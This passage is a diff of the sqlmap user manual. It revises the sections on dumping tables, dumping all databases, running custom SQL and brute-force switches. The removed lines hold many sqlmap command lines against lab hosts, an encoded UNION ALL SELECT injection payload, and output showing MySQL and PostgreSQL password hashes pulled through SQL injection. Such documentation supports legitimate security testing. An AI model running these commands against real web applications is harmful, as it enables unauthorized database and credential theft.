-[hh:mm:20] [INFO] retrieved: varchar(500)
-[hh:mm:21] [INFO] retrieved: surname
-[hh:mm:21] [INFO] retrieved: varchar(1000)
 Database: testdb
 Table: users
 [2 columns]
@@ -3097,6 +2028,13 @@ Table: users
 +---------+---------------+
 </verb></tscreen>
 
+<p>
+Note that on PostgreSQL you have to provide <tt>public</tt> or the
+name of a system database. That's because it is not possible to enumerate 
+other databases tables, only the tables under the schema that the web
+application's user is connected to, which is always aliased by
+<tt>public</tt>.
+
 
 <sect2>Dump database table entries
 
@@ -3106,57 +2044,28 @@ Switches: <tt>-</tt><tt>-dump</tt>, <tt>-C</tt>, <tt>-T</tt>, <tt>-D</tt>,
 and <tt>-</tt><tt>-last</tt>
 
 <p>
-It is possible to dump table entries.
-This functionality depends on the option <tt>-T</tt> to specify the table
-name or on the option <tt>-C</tt> to specify the column name and,
-optionally on <tt>-D</tt> to specify the database name.
+When the session user has read access to a specific database's table it is
+possible to dump the table entries.
 
 <p>
-If the table name is specified, but the database name is not, the current
+This functionality depends on switch <tt>-T</tt> to specify the table
+name and optionally on switch <tt>-D</tt> to specify the database name.
+If the table name is provided, but the database name is not, the current
 database name is used.
 
 <p>
-Example on a <bf>MySQL 5.0.67</bf> target:
+Example against a Firebird target:
 
 <tscreen><verb>
-$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.php?id=1" --dump \
-  -T users -v 1
-
+$ python sqlmap.py -u "http://debiandev/sqlmap/firebird/get_int.php?id=1" --dump -T users
 [...]
-back-end DBMS: MySQL >= 5.0.0
-
-[hh:mm:41] [WARNING] missing database parameter, sqlmap is going to use the current 
-database to dump table 'users' entries
-[hh:mm:41] [INFO] fetching current database
-[hh:mm:41] [INFO] retrieved: testdb
-[hh:mm:41] [INFO] fetching columns for table 'users' on database 'testdb'
-[hh:mm:41] [INFO] fetching number of columns for table 'users' on database 'testdb'
-[hh:mm:41] [INFO] retrieved: 3
-[hh:mm:41] [INFO] retrieved: id
-[hh:mm:41] [INFO] retrieved: name
-[hh:mm:41] [INFO] retrieved: surname
-[hh:mm:41] [INFO] fetching entries for table 'users' on database 'testdb'
-[hh:mm:41] [INFO] fetching number of entries for table 'users' on database 'testdb'
-[hh:mm:41] [INFO] retrieved: 4
-[hh:mm:41] [INFO] retrieved: 1
-[hh:mm:42] [INFO] retrieved: luther
-[hh:mm:42] [INFO] retrieved: blissett
-[hh:mm:42] [INFO] retrieved: 2
-[hh:mm:42] [INFO] retrieved: fluffy
-[hh:mm:42] [INFO] retrieved: bunny
-[hh:mm:42] [INFO] retrieved: 3
-[hh:mm:42] [INFO] retrieved: wu
-[hh:mm:42] [INFO] retrieved: ming
-[hh:mm:43] [INFO] retrieved: 4
-[hh:mm:43] [INFO] retrieved:  
-[hh:mm:43] [INFO] retrieved: nameisnull
-Database: testdb
-Table: users
+Database: Firebird_masterdb
+Table: USERS
 [4 entries]
 +----+--------+------------+
-| id | name   | surname    |
+| ID | NAME   | SURNAME    |
 +----+--------+------------+
-| 1  | luther | blissett   |
+| 1  | luther | blisset    |
 | 2  | fluffy | bunny      |
 | 3  | wu     | ming       |
 | 4  | NULL   | nameisnull |
@@ -3164,181 +2073,40 @@ Table: users
 </verb></tscreen>
 
 <p>
-You can also provide the <tt>-C</tt> option to specify the table column
-that you want to enumerate the entries.
+You can also provide a comma-separated list of the specific columns to
+dump with the <tt>-C</tt> switch.
 
 <p>
-Example on a <bf>Microsoft SQL Server 2000 Service Pack 0</bf> target:
-
-<tscreen><verb>
-$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/get_int.php?id=1" --dump \
-  -T users -D master -C surname -v 0
-
-Database: master
-Table: users
-[5 entries]
-+-------------------+
-| surname           |
-+-------------------+
-| blisset           |
-| bunny             |
-| ming              |
-| nameisnull        |
-| user agent header |
-+-------------------+
-</verb></tscreen>
+sqlmap also generates for each table dumped the entries in a CSV format
+textual file.
+You can see the absolute path where sqlmap creates the file by providing a
+verbosity level greater than or equal to <bf>1</bf>.
 
 <p>
-If only the column name is specified, sqlmap will enumerate and ask the
-user to dump all databases' tables containing user provided column(s).
-This feature can be useful to identify, for instance, tables containing
-custom application credentials.
+If you want to dump only a range of entries, then you can provide switches
+<tt>-</tt><tt>-start</tt> and/or <tt>-</tt><tt>-stop</tt> to respectively
+start to dump from a certain entry and stop the dump at a certain entry.
+For instance, if you want to dump only the first entry, provide
+<tt>-</tt><tt>-stop 1</tt> in your command line. Vice versa if, for
+instance, you want to dump only the second and third entry, provide
+<tt>-</tt><tt>-start 1</tt> <tt>-</tt><tt>-stop 3</tt>.
 
 <p>
-Example on a <bf>MySQL 5.0.67</bf> target:
-
-<tscreen><verb>
-$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.php?id=1" -v 1 --dump \
-  -C "urna"
-
-[...]
-back-end DBMS: MySQL >= 5.0.0
-
-do you want sqlmap to consider provided column(s):
-[1] as LIKE column names (default)
-[2] as exact column names
-> 1
-[hh:mm:08] [INFO] fetching databases with tables containing columns like 'urna'
-[hh:mm:08] [INFO] fetching number of databases with tables containing columns like 
-'urna'
-[hh:mm:08] [INFO] retrieved: 1
-[hh:mm:08] [INFO] retrieved: testdb
-[hh:mm:10] [INFO] fetching tables containing columns like 'urna' in database 'testdb'
-[hh:mm:10] [INFO] fetching number of tables containing columns like 'urna' in 
-database 'testdb'
-[hh:mm:10] [INFO] retrieved: 1
-[hh:mm:10] [INFO] retrieved: users
-[hh:mm:10] [INFO] fetching columns like 'urna' for table 'users' on database 'testdb'
-[hh:mm:10] [INFO] fetching number of columns for table 'users' on database 'testdb'
-[hh:mm:10] [INFO] retrieved: 1
-[hh:mm:10] [INFO] retrieved: surname
-Columns like 'urna' were found in the following databases:
-Database: testdb
-Table: users
-[1 column]
-+---------+
-| Column  |
-+---------+
-| surname |
-+---------+
-
-do you want to dump entries? [Y/n] y
-which database(s)?
-[a]ll (default)
-[testdb]
-[q]uit
-> 
-which table(s) of database 'testdb'?
-[a]ll (default)
-[users]
-[s]kip
-[q]uit
-> 
-[hh:mm:23] [INFO] fetching columns 'surname' entries for table 'users' on 
-database 'testdb'
-[hh:mm:23] [INFO] fetching number of columns 'surname' entries for table 
-'users' on database 'testdb'
-[hh:mm:23] [INFO] retrieved: 4
-[hh:mm:23] [INFO] retrieved: blissett
-[hh:mm:23] [INFO] retrieved: bunny
-[hh:mm:23] [INFO] retrieved: ming
-[hh:mm:23] [INFO] retrieved: nameisnull
-Database: testdb
-Table: users
-[4 entries]
-+------------+
-| surname    |
-+------------+
-| blissett   |
-| bunny      |
-| ming       |
-| nameisnull |
-+------------+
-</verb></tscreen>
+It is also possible to specify which single character or range of characters
+to dump with switches <tt>-</tt><tt>-first</tt> and <tt>-</tt><tt>-last</tt>.
+For instance, if you want to dump columns' entries from the third to the
+fifth character, provide <tt>-</tt><tt>-first 3</tt> <tt>-</tt><tt>-last
+5</tt>.
+This feature only applies to the blind SQL injection techniques because for
+error-based and UNION query SQL injection techniques the number of requests
+is exactly the same, regardless of the length of the column's entry output
+to dump.
 
 <p>
-sqlmap also stores for each table the dumped entries in a CSV format file.
-You can see the absolute path where sqlmap stores the dumped tables entries
-by providing a verbosity level greater than or equal to 1.
-
-<p>
-Example on a <bf>PostgreSQL 8.3.5</bf> target:
-
-<tscreen><verb>
-$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" --dump \
-  -T users -D public -v 1
-
-[...]
-Database: public
-Table: users
-[5 entries]
-+----+----------------------------------------------+-------------------+
-| id | name                                         | surname           |
-+----+----------------------------------------------+-------------------+
-| 1  | luther                                       | blissett          |
-| 2  | fluffy                                       | bunny             |
-| 3  | wu                                           | ming              |
-| 4  | sqlmap/0.8 (http://sqlmap.sourceforge.net)   | user agent header |
-| 5  |                                              | nameisnull        |
-+----+----------------------------------------------+-------------------+
-
-[hh:mm:59] [INFO] Table 'public.users' dumped to CSV file '/home/inquis/sqlmap/output/
-192.168.136.131/dump/public/users.csv'
-[...]
-
-$ cat ./output/192.168.136.131/dump/public/users.csv 
-id,name,surname
-"1","luther","blissett"
-"2","fluffy","bunny"
-"3","wu","ming"
-"4","sqlmap/0.8 (http://sqlmap.sourceforge.net)","user agent header"
-"5","","nameisnull"
-</verb></tscreen>
-
-<p>
-You can also provide the <tt>-</tt><tt>-start</tt> and/or the <tt>-</tt><tt>-stop</tt>
-options to limit the dump to a range of entries, while those entries can be further
-limited to a range of character positions provided with <tt>-</tt><tt>-first</tt> 
-and/or the <tt>-</tt><tt>-last</tt> options:
-
-<itemize>
-<item><tt>-</tt><tt>-start</tt> specifies the first entry to enumerate.
-<item><tt>-</tt><tt>-stop</tt> specifies the last entry to enumerate.
-</itemize>
-
-<p>
-Example on a <bf>MySQL 5.0.67</bf> target:
-
-<tscreen><verb>
-$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.php?id=1" --dump \
-  -T users -D testdb --start 2 --stop 4 -v 0
-
-Database: testdb
-Table: users
-[3 entries]
-+----+--------------------------------------------+-------------------+
-| id | name                                       | surname           |
-+----+--------------------------------------------+-------------------+
-| 2  | fluffy                                     | bunny             |
-| 3  | wu                                         | ming              |
-| 4  | sqlmap/0.8 (http://sqlmap.sourceforge.net) | user agent header |
-+----+--------------------------------------------+-------------------+
-</verb></tscreen>
-
-<p>
-As you can see, sqlmap is very flexible. You can leave it to automatically
-enumerate the whole database table up to a range of characters of a single
-column of a specific table entry.
+As you know by down, sqlmap is <bf>flexible</bf>. You can leave it to
+automatically enumerate the whole database table or you can be very
+precise in which characters to dump, from which columns and which range of
+entries.
 
 
 <sect2>Dump all databases tables entries
@@ -3347,120 +2115,13 @@ column of a specific table entry.
 Switches: <tt>-</tt><tt>-dump-all</tt> and <tt>-</tt><tt>-exclude-sysdbs</tt>
 
 <p>
-It is possible to dump all databases tables entries at once.
-
-Example on a <bf>MySQL 5.0.67</bf> target:
-
-<tscreen><verb>
-$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.php?id=1" --dump-all -v 0
-
-Database: testdb
-Table: users
-[5 entries]
-+----+--------------------------------------------+-------------------+
-| id | name                                       | surname           |
-+----+--------------------------------------------+-------------------+
-| 1  | luther                                     | blissett          |
-| 2  | fluffy                                     | bunny             |
-| 3  | wu                                         | ming              |
-| 4  | sqlmap/0.8 (http://sqlmap.sourceforge.net) | user agent header |
-| 5  | NULL                                       | nameisnull        |
-+----+--------------------------------------------+-------------------+
-
-Database: information_schema
-Table: CHARACTER_SETS
-[36 entries]
-+--------------------+----------------------+-----------------------------+--------+
-| CHARACTER_SET_NAME | DEFAULT_COLLATE_NAME | DESCRIPTION                 | MAXLEN |
-+--------------------+----------------------+-----------------------------+--------+
-| tis620             | tis620_thai_ci       | TIS620 Thai                 | 1      |
-| macroman           | macroman_general_ci  | Mac West European           | 1      |
-| dec8               | dec8_swedish_ci      | DEC West European           | 1      |
-| ujis               | ujis_japanese_ci     | EUC-JP Japanese             | 3      |
-| eucjpms            | eucjpms_japanese_ci  | UJIS for Windows Japanese   | 3      |
-| armscii8           | armscii8_general_ci  | ARMSCII-8 Armenian          | 1      |
-| ucs2               | ucs2_general_ci      | UCS-2 Unicode               | 2      |
-| hp8                | hp8_english_ci       | HP West European            | 1      |
-| latin2             | latin2_general_ci    | ISO 8859-2 Central European | 1      |
-| koi8u              | koi8u_general_ci     | KOI8-U Ukrainian            | 1      |
-| keybcs2            | keybcs2_general_ci   | DOS Kamenicky Czech-Slovak  | 1      |
-| ascii              | ascii_general_ci     | US ASCII                    | 1      |
-| cp866              | cp866_general_ci     | DOS Russian                 | 1      |
-| cp1256             | cp1256_general_ci    | Windows Arabic              | 1      |
-| macce              | macce_general_ci     | Mac Central European        | 1      |
-| sjis               | sjis_japanese_ci     | Shift-JIS Japanese          | 2      |
-| geostd8            | geostd8_general_ci   | GEOSTD8 Georgian            | 1      |
-| cp1257             | cp1257_general_ci    | Windows Baltic              | 1      |
-| cp852              | cp852_general_ci     | DOS Central European        | 1      |
-| euckr              | euckr_korean_ci      | EUC-KR Korean               | 2      |
-| cp1250             | cp1250_general_ci    | Windows Central European    | 1      |
-| cp1251             | cp1251_general_ci    | Windows Cyrillic            | 1      |
-| binary             | binary               | Binary pseudo charset       | 1      |
-| big5               | big5_chinese_ci      | Big5 Traditional Chinese    | 2      |
-| gb2312             | gb2312_chinese_ci    | GB2312 Simplified Chinese   | 2      |
-| hebrew             | hebrew_general_ci    | ISO 8859-8 Hebrew           | 1      |
-| koi8r              | koi8r_general_ci     | KOI8-R Relcom Russian       | 1      |
-| greek              | greek_general_ci     | ISO 8859-7 Greek            | 1      |
-| cp850              | cp850_general_ci     | DOS West European           | 1      |
-| utf8               | utf8_general_ci      | UTF-8 Unicode               | 3      |
-| latin1             | latin1_swedish_ci    | cp1252 West European        | 1      |
-| latin7             | latin7_general_ci    | ISO 8859-13 Baltic          | 1      |
-| cp932              | cp932_japanese_ci    | SJIS for Windows Japanese   | 2      |
-| latin5             | latin5_turkish_ci    | ISO 8859-9 Turkish          | 1      |
-| swe7               | swe7_swedish_ci      | 7bit Swedish                | 1      |
-| gbk                | gbk_chinese_ci       | GBK Simplified Chinese      | 2      |
-+--------------------+----------------------+-----------------------------+--------+
-
-[...]
-</verb></tscreen>
+It is possible to dump all databases tables entries at once that the
+session user has read access on.
 
 <p>
-You can also provide the <tt>-</tt><tt>-exclude-sysdbs</tt> option to exclude all
-system databases. In that case sqlmap will only dump entries of users' databases
-tables.
-
-<p>
-Example on a <bf>Microsoft SQL Server 2000 Service Pack 0</bf> target:
-
-<tscreen><verb>
-$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/get_int.php?id=1" --dump-all \
-  --exclude-sysdbs -v 0
-
-Database: master
-Table: spt_datatype_info_ext
-[10 entries]
-+----------------+-----------------+-----------+-----------+
-| AUTO_INCREMENT | CREATE_PARAMS   | typename  | user_type |
-+----------------+-----------------+-----------+-----------+
-| 0              | length          | char      | 175       |
-| 0              | precision,scale | numeric   | 108       |
-| 0              | max length      | varbinary | 165       |
-| 0              | precision,scale | decimal   | 106       |
-| 1              | precision       | numeric   | 108       |
-| 0              | length          | nchar     | 239       |
-| 0              | max length      | nvarchar  | 231       |
-| 0              | length          | binary    | 173       |
-| 0              | max length      | varchar   | 167       |
-| 1              | precision       | decimal   | 106       |
-+----------------+-----------------+-----------+-----------+
-
-[...]
-
-Database: master
-Table: users
-[5 entries]
-+----+----------------------------------------------+-------------------+
-| id | name                                         | surname           |
-+----+----------------------------------------------+-------------------+
-| 4  | sqlmap/0.8 (http://sqlmap.sourceforge.net)   | user agent header |
-| 2  | fluffy                                       | bunny             |
-| 1  | luther                                       | blisset           |
-| 3  | wu                                           | ming              |
-| 5  | NULL                                         | nameisnull        |
-+----+----------------------------------------------+-------------------+
-
-[...]
-</verb></tscreen>
+You can also provide the <tt>-</tt><tt>-exclude-sysdbs</tt> switch to
+exclude all system databases. In that case sqlmap will only dump entries
+of users' databases tables.
 
 <p>
 Note that on Microsoft SQL Server the <tt>master</tt> database is not
@@ -3468,26 +2129,40 @@ considered a system database because some database administrators use it
 as a users' database.
 
 
-<sect2>Execute custom SQL statement
+<sect2>Search for columns, tables or databases
+
+<p>
+Switches: <tt>-</tt><tt>-search</tt>, <tt>-C</tt>, <tt>-T</tt>, <tt>-D</tt>
+
+<p>
+TODO
+
+
+<sect2>Run custom SQL statement
 
 <p>
 Switches: <tt>-</tt><tt>-sql-query</tt> and <tt>-</tt><tt>-sql-shell</tt>
 
 <p>
-The SQL query and the SQL shell features makes the user able to execute
-custom SQL statements on the web application's back-end database
-management.
+The SQL query and the SQL shell features allow to run arbitrary SQL
+statements on the database management system.
 sqlmap automatically dissects the provided statement, determines which
-technique to use to inject it and how to pack the SQL payload accordingly.
-
-If it is a <tt>SELECT</tt> statement, sqlmap will retrieve its output
-through the blind SQL injection or UNION query SQL injection technique
-depending on the user's options. Otherwise it will execute the query
-through the stacked query SQL injection technique if the web application
-supports multiple statements on the back-end database management system.
+technique is appropriate to use to inject it and how to pack the SQL
+payload accordingly.
 
 <p>
-Examples on a <bf>Microsoft SQL Server 2000 Service Pack 0</bf> target:
+If the query is a <tt>SELECT</tt> statement, sqlmap will retrieve its
+output.
+Otherwise it will execute the query through the stacked query SQL
+injection technique if the web application supports multiple statements on
+the back-end database management system.
+Beware that some web application technologies do not support stacked
+queries on specific database management systems. For instance, PHP does
+not support stacked queries when the back-end DBMS is MySQL, but it does
+support when the back-end DBMS is PostgreSQL.
+
+<p>
+Examples against a Microsoft SQL Server 2000 target:
 
 <tscreen><verb>
 $ python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/get_int.php?id=1" --sql-query \
@@ -3517,335 +2192,52 @@ SELECT 'foo', 'bar':    'foo, bar'
 </verb></tscreen>
 
 <p>
-As you can see from the last example, sqlmap splits provided query into two
-different <tt>SELECT</tt> statements for it to be able to retrieve the 
-output even in case when using the blind SQL injection technique.
-Otherwise, in UNION query SQL injection technique it only performs a single
-HTTP request to get the user's query output:
-
-<tscreen><verb>
-$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/get_int.php?id=1" --sql-query \
-  "SELECT 'foo', 'bar'" -v 2 --union-use
-
-[...]
-[hh:mm:03] [INFO] fetching SQL SELECT query output: 'SELECT 'foo', 'bar''
-[hh:mm:03] [INFO] testing inband sql injection on parameter 'id' with NULL bruteforcing 
-technique
-[hh:mm:03] [INFO] the target url could be affected by an inband sql injection vulnerability
-[hh:mm:03] [INFO] confirming full inband sql injection on parameter 'id'
-[hh:mm:03] [INFO] the target url is affected by an exploitable full inband sql injection
-vulnerability
-[hh:mm:03] [DEBUG] query:  UNION ALL SELECT NULL, (CHAR(77)+CHAR(68)+CHAR(75)+CHAR(104)+
-CHAR(70)+CHAR(67))+ISNULL(CAST((CHAR(102)+CHAR(111)+CHAR(111)) AS VARCHAR(8000)), (CHAR(32)))
-+(CHAR(105)+CHAR(65)+CHAR(119)+CHAR(105)+CHAR(108)+CHAR(108))+ISNULL(CAST((CHAR(98)+CHAR(97)+
-CHAR(114)) AS VARCHAR(8000)), (CHAR(32)))+(CHAR(66)+CHAR(78)+CHAR(104)+CHAR(75)+CHAR(114)+
-CHAR(116)), NULL-- AND 8373=8373
-[hh:mm:03] [DEBUG] performed 3 queries in 0 seconds
-SELECT 'foo', 'bar' [1]:
-[*] foo, bar
-</verb></tscreen>
+As you can see, sqlmap splits the provided query into two different
+<tt>SELECT</tt> statements then retrieves the output for each separate
+query.
 
 <p>
-If your <tt>SELECT</tt> statement contains a <tt>FROM</tt> clause, sqlmap
-asks the user if such statement can return multiple entries. In that
-case the tool knows how to unpack the query correctly to retrieve its
-whole output, entry per entry, when going through blind SQL injection
-technique. In provided example, UNION query SQL injection it retrieved 
-the whole output in a single response.
+If the provided query is a <tt>SELECT</tt> statement and contains a
+<tt>FROM</tt> clause, sqlmap will ask you if such statement can return
+multiple entries. In that case the tool knows how to unpack the query
+correctly to count the number of possible entries and retrieve its output,
+entry per entry.
 
 <p>
-Example on a <bf>PostgreSQL 8.3.5</bf> target:
+The SQL shell option allows you to run your own SQL statement
+interactively, like a SQL console connected to the database management
+system.
+This feature provides TAB completion and history support too.
 
-<tscreen><verb>
-$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" --sql-query \
-  "SELECT usename FROM pg_user" -v 0
 
-[hh:mm:32] [INPUT] can the SQL query provided return multiple entries? [Y/n] y
-[hh:mm:37] [INPUT] the SQL query provided can return up to 3 entries. How many entries 
-do you want to retrieve?
-[a] All (default)
-[#] Specific number
-[q] Quit
-Choice: 2
-SELECT usename FROM pg_user [2]:
-[*] postgres
-[*] testuser
-</verb></tscreen>
+<sect1>Brute force
 
 <p>
-As you can see from the last example, sqlmap counts the number of entries
-for a given query and asks for number of entries to dump.
-Otherwise, if the <tt>LIMIT</tt> is also specified, or similar clause,
-sqlmap will not ask for anything. It will just unpack the query and return its
-output, entry per entry, when going through blind SQL injection technique.
-In a given example, sqlmap used UNION query SQL injection to retrieve the 
-whole output in a single response.
+These options can be used to run brute force checks.
+
+<sect2>Brute force tables names
 
 <p>
-Example on a <bf>MySQL 5.0.67</bf> target:
-
-<tscreen><verb>
-$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.php?id=1" --sql-query \
-  "SELECT host, password FROM mysql.user LIMIT 1, 3" -v 2
-
-[...]
-back-end DBMS:  MySQL >= 5.0.0
-
-[hh:mm:22] [INFO] fetching SQL SELECT statement query output: 'SELECT host, password FROM 
-mysql.user LIMIT 1, 3'
-[hh:mm:22] [INFO] the SQL query provided has more than a field. sqlmap will now unpack it 
-into distinct queries to be able to retrieve the output even if we are going blind
-[hh:mm:22] [DEBUG] query: SELECT IFNULL(CAST(host AS CHAR(10000)), CHAR(32)) FROM 
-mysql.user LIMIT 1, 1
-[hh:mm:22] [INFO] retrieved: localhost
-[hh:mm:22] [DEBUG] performed 69 queries in 0 seconds
-[hh:mm:22] [DEBUG] query: SELECT IFNULL(CAST(password AS CHAR(10000)), CHAR(32)) FROM 
-mysql.user LIMIT 1, 1
-[hh:mm:22] [INFO] retrieved: *00E247AC5F9AF26AE0194B41E1E769DEE1429A29
-[hh:mm:24] [DEBUG] performed 293 queries in 2 seconds
-[hh:mm:24] [DEBUG] query: SELECT IFNULL(CAST(host AS CHAR(10000)), CHAR(32)) FROM 
-mysql.user LIMIT 2, 1
-[hh:mm:24] [INFO] retrieved: localhost
-[hh:mm:25] [DEBUG] performed 69 queries in 0 seconds
-[hh:mm:25] [DEBUG] query: SELECT IFNULL(CAST(password AS CHAR(10000)), CHAR(32)) FROM 
-mysql.user LIMIT 2, 1
-[hh:mm:25] [INFO] retrieved: *00E247AC5F9AF26AE0194B41E1E769DEE1429A29
-[hh:mm:27] [DEBUG] performed 293 queries in 2 seconds
-[hh:mm:27] [DEBUG] query: SELECT IFNULL(CAST(host AS CHAR(10000)), CHAR(32)) FROM 
-mysql.user LIMIT 3, 1
-[hh:mm:27] [INFO] retrieved: localhost
-[hh:mm:28] [DEBUG] performed 69 queries in 0 seconds
-[hh:mm:28] [DEBUG] query: SELECT IFNULL(CAST(password AS CHAR(10000)), CHAR(32)) 
-FROM mysql.user LIMIT 3, 1
-[hh:mm:28] [INFO] retrieved: 
-[hh:mm:28] [DEBUG] performed 6 queries in 0 seconds
-SELECT host, password FROM mysql.user LIMIT 1, 3 [3]:
-[*] localhost, *00E247AC5F9AF26AE0194B41E1E769DEE1429A29
-[*] localhost, *00E247AC5F9AF26AE0194B41E1E769DEE1429A29
-[*] localhost, 
-</verb></tscreen>
+Switches: <tt>-</tt><tt>-common-tables</tt>
 
 <p>
-The SQL shell option gives you an access to run your own SQL statement
-interactively, like a SQL console connected to the back-end database
-management system.
-Note that this feature provides TAB completion and history support.
+TODO
+
+
+<sect2>Brute force columns names
 
 <p>
-Example of history support on a <bf>PostgreSQL 8.3.5</bf> target:
-
-<tscreen><verb>
-$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" --sql-shell -v 0
-
-sql> SELECT 'foo'
-SELECT 'foo':    'foo'
-
-sql> [UP arrow key shows the just run SQL SELECT statement, DOWN arrow key cleans the shell]
-sql> SELECT version()
-SELECT version():    'PostgreSQL 8.3.5 on i486-pc-linux-gnu, compiled by GCC gcc-4.3.real 
-(Ubuntu 4.3.2-1ubuntu11) 4.3.2'
-
-sql> exit
-
-$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" --sql-shell -v 0
-
-sql> [UP arrow key shows 'exit', then DOWN arrow key clean the shell]
-sql> SELECT usename, passwd FROM pg_shadow ORDER BY usename
-[hh:mm:45] [INPUT] does the SQL query that you provide might return multiple entries? [Y/n] y
-[hh:mm:46] [INPUT] the SQL query that you provide can return up to 3 entries. How many entries 
-do you want to retrieve?
-[a] All (default)
-[#] Specific number
-[q] Quit
-Choice: 2
-SELECT usename, passwd FROM pg_shadow ORDER BY usename [3]:
-[*] postgres, md5d7d880f96044b72d0bba108ace96d1e4
-[*] testuser, md599e5ea7a6f7c3269995cba3927fd0093
-</verb></tscreen>
+Switches: <tt>-</tt><tt>-common-columns</tt>
 
 <p>
-Example of TAB completion on a <bf>MySQL 5.0.67</bf> target:
-
-<tscreen><verb>
-$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.php?id=1" --sql-shell -v 0
-
-sql> [TAB TAB]
- LIMIT 
-(SELECT super_priv FROM mysql.user WHERE user=(SUBSTRING_INDEX(CURRENT_USER(), '@', 1)) 
-LIMIT 0, 1)='Y'
-AND ORD(MID((%s), %d, 1)) > %d
-CAST(%s AS CHAR(10000))
-COUNT(%s)
-CURRENT_USER()
-DATABASE()
-IFNULL(%s, ' ')
-LENGTH(%s)
-LIMIT %d, %d
-MID((%s), %d, %d)
-ORDER BY %s ASC
-SELECT %s FROM %s.%s
-SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)
-SELECT column_name, column_type FROM information_schema.COLUMNS WHERE table_name='%s' AND 
-table_schema='%s'
-SELECT grantee FROM information_schema.USER_PRIVILEGES
-SELECT grantee, privilege_type FROM information_schema.USER_PRIVILEGES
-SELECT schema_name FROM information_schema.SCHEMATA
-SELECT table_schema, table_name FROM information_schema.TABLES
-SELECT user, password FROM mysql.user
-SLEEP(%d)
-VERSION()
-\s+LIMIT\s+([\d]+)\s*\,\s*([\d]+)
-sql> SE[TAB]
-sql> SELECT
-</verb></tscreen>
-
-<p>
-As you can see the TAB functionality shows the queries defined for the
-back-end database management system in sqlmap XML queries file, but you
-can run whatever <tt>SELECT</tt> statement you want.
-
-<p>
-Example of asterisk expansion on a <bf>MySQL 5.0.67</bf> target:
-
-<tscreen><verb>
-$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.php?id=1" --sql-shell \
-  -v 2
-
-[...]
-[hh:mm:40] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
-sql> SELECT * FROM test.users
-[hh:mm:48] [INFO] fetching SQL SELECT query output: 'SELECT * FROM test.users'
-[hh:mm:48] [INFO] you did not provide the fields in your query. sqlmap will retrieve the 
-column names itself.
-[hh:mm:48] [INFO] fetching columns for table 'users' on database 'test'
-[hh:mm:48] [INFO] fetching number of columns for table 'users' on database 'test'
-[hh:mm:48] [DEBUG] query: SELECT IFNULL(CAST(COUNT(column_name) AS CHAR(10000)), CHAR(32)) 
-FROM information_schema.COLUMNS WHERE table_name=CHAR(117,115,101,114,115) AND 
-table_schema=CHAR(116,101,115,116)
-[hh:mm:48] [INFO] retrieved: 3
-[hh:mm:48] [DEBUG] performed 13 queries in 0 seconds
-[hh:mm:48] [DEBUG] query: SELECT IFNULL(CAST(column_name AS CHAR(10000)), CHAR(32)) FROM 
-information_schema.COLUMNS WHERE table_name=CHAR(117,115,101,114,115) AND 
-table_schema=CHAR(116,101,115,116) LIMIT 0, 1
-[hh:mm:48] [INFO] retrieved: id
-[hh:mm:48] [DEBUG] performed 20 queries in 0 seconds
-[hh:mm:48] [DEBUG] query: SELECT IFNULL(CAST(column_name AS CHAR(10000)), CHAR(32)) FROM 
-information_schema.COLUMNS WHERE table_name=CHAR(117,115,101,114,115) AND 
-table_schema=CHAR(116,101,115,116) LIMIT 1, 1
-[hh:mm:48] [INFO] retrieved: name
-[hh:mm:48] [DEBUG] performed 34 queries in 0 seconds
-[hh:mm:48] [DEBUG] query: SELECT IFNULL(CAST(column_name AS CHAR(10000)), CHAR(32)) FROM 
-information_schema.COLUMNS WHERE table_name=CHAR(117,115,101,114,115) AND 
-table_schema=CHAR(116,101,115,116) LIMIT 2, 1
-[hh:mm:48] [INFO] retrieved: surname
-[hh:mm:48] [DEBUG] performed 55 queries in 0 seconds
-[hh:mm:48] [INFO] the query with column names is: SELECT id, name, surname FROM test.users
-[hh:mm:48] [INPUT] can the SQL query provided return multiple entries? [Y/n] y
-[hh:mm:04] [DEBUG] query: SELECT IFNULL(CAST(COUNT(id) AS CHAR(10000)), CHAR(32)) FROM 
-test.users
-[hh:mm:04] [INFO] retrieved: 5
-[hh:mm:04] [DEBUG] performed 13 queries in 0 seconds
-[hh:mm:04] [INPUT] the SQL query that you provide can return up to 5 entries. How many 
-entries 
-do you want to retrieve?
-[a] All (default)
-[#] Specific number
-[q] Quit
-Choice: 3
-[hh:mm:09] [INFO] sqlmap is now going to retrieve the first 3 query output entries
-[hh:mm:09] [DEBUG] query: SELECT IFNULL(CAST(id AS CHAR(10000)), CHAR(32)) FROM test.users 
-ORDER BY id ASC LIMIT 0, 1
-[hh:mm:09] [INFO] retrieved: 1
-[hh:mm:09] [DEBUG] performed 13 queries in 0 seconds
-[hh:mm:09] [DEBUG] query: SELECT IFNULL(CAST(name AS CHAR(10000)), CHAR(32)) FROM test.users 
-ORDER BY id ASC LIMIT 0, 1
-[hh:mm:09] [INFO] retrieved: luther
-[hh:mm:09] [DEBUG] performed 48 queries in 0 seconds
-[hh:mm:09] [DEBUG] query: SELECT IFNULL(CAST(surname AS CHAR(10000)), CHAR(32)) FROM 
-test.users ORDER BY id ASC LIMIT 0, 1
-[hh:mm:09] [INFO] retrieved: blissett
-[hh:mm:09] [DEBUG] performed 62 queries in 0 seconds
-[hh:mm:09] [DEBUG] query: SELECT IFNULL(CAST(id AS CHAR(10000)), CHAR(32)) FROM test.users 
-ORDER BY id ASC LIMIT 1, 1
-[hh:mm:09] [INFO] retrieved: 2
-[hh:mm:09] [DEBUG] performed 13 queries in 0 seconds
-[hh:mm:09] [DEBUG] query: SELECT IFNULL(CAST(name AS CHAR(10000)), CHAR(32)) FROM test.users 
